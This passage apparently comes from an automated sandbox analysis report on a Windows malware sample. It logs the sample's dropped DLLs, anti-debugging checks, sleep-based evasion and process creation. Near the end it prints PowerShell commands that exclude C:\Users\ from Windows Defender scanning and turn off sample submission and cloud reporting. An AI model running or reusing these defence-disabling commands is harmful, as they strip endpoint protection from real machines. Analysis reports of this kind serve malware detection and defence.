Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,24_2_00007FFDA55A7694
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,24_2_00007FFDA5576078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,24_2_00007FFDA55AB648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,24_2_00007FFDA55D2738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,24_2_00007FFDA5BA3058
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,24_2_00007FFDAC0F4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,24_2_00007FFDAC121D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5714Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4113Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6137Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3594Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7537Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1915Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\nVYOsq5aJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\459WBsWAJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\o1i2PUnIJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\LL369bffJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\OKh5fbg5Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\SCKoP3sQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\ZNdEbgqyJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\CheAuE4kJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\m28TQ56qJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_24-63363
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-11113
Source: C:\Users\user\Desktop\file.exe TID: 2836Thread sleep time: -33840000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2836Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2732Thread sleep count: 5714 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4160Thread sleep count: 4113 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 6137 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep count: 3594 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep count: 7537 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2444Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep count: 1915 > 30Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1476Thread sleep count: 53 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6112Thread sleep count: 50 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 6196Thread sleep count: 52 > 30
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF66EBA3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FF70CAD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA557A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA557A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55A1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA55A1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55D5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA55D5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5BA57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA5BA57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC0F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDAC0F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDAC122FE3
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: main.exe, 00000018.00000003.2332385927.0000021B15AC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll 5
Source: file.exe, 00000001.00000002.3365612779.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383380591.000001C9F4B68000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000018.00000002.2874139711.0000021B15AC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000022.00000002.3266264150.000002204C289000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI call chain: ExitProcess graph end nodegraph_24-60417
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBAFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,6_2_00007FF66EBAFF1F
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA97F2 GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,strncpy,strncpy,strncpy,6_2_00007FF66EBA97F2
Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,6_2_00007FF66EBA1131
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAD1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,24_2_00007FF70CAD1131

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF66EBA292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
